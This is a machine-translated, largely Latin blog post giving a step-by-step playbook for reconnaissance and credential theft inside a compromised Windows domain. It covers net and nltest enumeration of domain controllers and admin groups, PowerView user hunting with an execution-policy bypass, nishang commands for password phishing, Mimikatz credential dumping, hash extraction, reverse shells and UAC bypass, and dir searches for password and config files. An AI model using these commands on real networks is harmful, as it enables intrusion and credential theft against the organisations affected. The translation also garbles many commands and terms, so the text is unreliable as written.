Technology sharing

Securitas intranet: notitia detectio intra-domain

2024-07-12

한어Русский языкEnglishFrançaisIndonesianSanskrit日本語DeutschPortuguêsΕλληνικάespañolItalianoSuomalainenLatina

1. collection of basic notitia intra domain

2.NET mandata explicatio

3. collectione Domain modi maxime usus est in intranets

4. Quomodo invenire domain moderatoris

5. Query basic notitia of users in domain

6. Positioning domain administratione

7.Powershell imperium et locare sensitivo informationes







1. Collectio notitiarum fundamentalium intra domain:

Quattuor casus:

1. Locus user: usor

2. Administrator localis usor: debilitata in versione home, tantum available in servo

3. Users intra domain

4. domain administrator

Ordinarius loci users obtinere non potest domain informationem

Utentes administratores locales recta iura sua ad usores systematis (usores intra dominium) directe effodire possunt et informationes habere intra dominium.

1. Utrum domain exstat;

1. Reprehendo in domain: ipconfig / omnia vel systeminfo vel rete aboutconfig workstation

ipconfig /all: Found domain: hack.com

systeminfo: regio inventa est: hack.com

2. Inspice DNS exercitum in domain: nslookup nomen domain (hack.com)

3.Net tempus / domain tria

Domain existit, sed usor currentis non est usor domain

A domain existit et usor currentis est domain usor

Hodierna network environment est workgroup et nulla regio exstat

2.NET imperium singula:

1.net visum: Proponere domain album, indicem computatorium, certa computatrale facultates communes: visum rete (propono indicem computatrum) rete visum \ computatorium

rete visum / domain: domain nomen (hack) (ostentationem computatorii list)

2.net user to view local users: rete user / domain to view how many users are in the domain?

Add user: rete nomen usoris (admin) password (123)/addendi

3.net usus: Coniunge computatrum vel disiungo computatrum a communi resource, nexum informationes computatrum display

4.net tempus: tempus utere synchronise computers vel domains: rete tempus \ computatrum rete tempus / domain

5.net initium: Satus servitium, seu servitium initum propono: satus servitium rete

6.net pausa: currit servitium: net pause service

7.net continue: Reactivate ministerium: rete continue ministerium

8.net stop: Stop Windows NT/2000/2003 service: net stop service

9.net participes: delere, creare, vel ostentare facultates communes

Sessionis 10.net: Enumerare vel disiungere sessiones computatoris localis et clientium cum eo conexorum;

rete sessionem // computatrum (identifies computer ut enumerantur vel sessioned)

rete sessionem // computatrum delete (disconnect sessionem praefinitum computatrum)

11.net localgroup View computatrum group (solum loci applicabilis): rete localgroup nomen usoris

Domain user: retia localgroup nomen usoris/domain

12.net coetus queritur nomen catervae in dominio (solum ad domain moderatoris): rete coetus / domain

13.net config ostendit officia configurabilia currently currentes, vel figuram servitii (locum localiter);

rete aboutconfig (rete officia currit) aboutconfig retia officia (ostendit indicem officiorum)

14.net computatrum Add or delete computers from the domain database:

rete computatrum \ computername / addendi vel / del (addendi vel delete computers in login domain)

3. collectione Domain modi maxime usus est in intranets

Si "in album ministri huius coetus operandi sit amet perpendat" apparet, officia da: Servo, WorkStation, Pasco computatorium, et fire murum claude.

Visum domain: ipconfig / omnia vel systeminfo vel rete aboutconfig workstation

DNS exercitum domain videre: nslookup nomen domain (hack.com)

Query domain: rete visum/domain

Query omnes computers in dominio: rete visum / domain: domain nomen

Quere indicem omnium circulorum usorum in ditione: rete coetus/domain

Quere indicem computatorium omnium membrorum domain: coetus rete "computatorum domain" /domain

Quaero tesseram informationem in dominio: rationes rete / domain

Accipere domain fiducia notitia: nltest /domain_trusts

4. Quomodo invenire domain moderatoris

Videre domain moderatoris nomen: nltest / DCLIST: hack

Nomen machinae videre, invenire IP, ping/nslookup: ping/nslookup nomen domain moderatoris

Aliquando ping debilis est.

View domain controller hostname: nslookup ‐type = SRV _ldap._tcp

Reprehendo hodiernam tempus: rete tempus / domain

Videre coetus domain moderatorem: rete coetus "Domain moderatoris" /domain

5. Query basic notitia of users in domain

1. Query user information in the domain: rete user / domain

2. View loci users: wmic useraccount nomen Domain users: wmic useraccount possidebit domain, nomen

Locus usor:

Domain user:

3. Reprehendo existentes users: dsquery usor (interdum exsecutioni mandari non potest et nonnisi in servo machinae currere)

4. Query administratorem localem usor coetus: retia administratorum localium

5. Query users domain administrator: coetus "domain admins" /domain

6. Query coetus domain administrator user: coetus rete "Inceptum Admins" /domain

6. Positioning domain administratione

Duo instrumenta hic requiruntur

Primum instrumentum upload servo et deinde illud

1.PVEFindADUser: PVEFindADUser.exe -current (viam notam) Hoc instrumentum inspicere potest quod utentes initium computandi habent, permittens nos administratorem domain invenire.

2.powerView script:

powershell.exe exec bypass imand" & { import‐module .PowerView.ps1; Invoke‐UserHunter}"

7.Powershell imperium et locare sensitivo informationes

Reprehendo licentias primum: ExecutionPolicy Get-

Mutare currit consilium: Set-ExecutionPolicy Unrestricted (modo Unrestricted permissiones possunt facere pow)

nishang instrumentum (est ligamen download in superiori articulo);

Postquam eam in indice CS inposuit, immediatam illam importat: powershell-import nishang/nishang.psm1

Judicium, powershell imperium

Quidam communiter imperat;

Reprehendo-VM: Reprehendo an hospes virtualis apparatus est

Invoke-CredentialsPhish: Furta user intrantes in password

Get-WLAN-Kes: WiFi information

Invoke-Mimikatz: Capere passwords

Get-PassHashes accipe Nullam

Get-PassHints accipe a user scriptor password admonitus notitia

Invoke-PowerShellTcp: Rebound testa

Invoke-PsUACme: bypass UAC

Aufer-Update: remove commissura

Adepto-Information: locali notitia

Exempli gratia: powershell Check-VM

Data locandi sensitivo:

1. Collecta varia sensitiva files designatis directoriis

dir /a /s /bd:"*.txt"

dir /a /s /b C:"*.xlsx"

dir /a /s /bd:"*.md"

dir /a /s /bd:"*.sql"

dir /a /s /bd:"*.pdf"

dir /a /s /bd:"*.docx"

dir /a /s /bd:"*.doc"

dir /a /s /bd:"*conf*"

dir /a /s /bd:"*bak*"

dir /a /s /bd:"*pwd*"

dir /a /s /bd:"*pass*"

dir /a /s /bd:"*login*"

dir /a /s /bd:"*usor*"

2. Collecta varia ratione Tesserae ex files in certa Directory

config *.in*.txt *.asp*.html

config*.ini*.txt*.asp*.aspx*.php*.jsp*.xml*.cgi*.bak

config*.ini*.txt*.asp*.aspx*.php*.jsp*.xml*.cgi*.bak

config *.ini *.txt *.asp*.html

usor *.inc *.config *.ini *.txt *.asp*.html.html

Exemplum: dir /a /s /bd:"*.txt"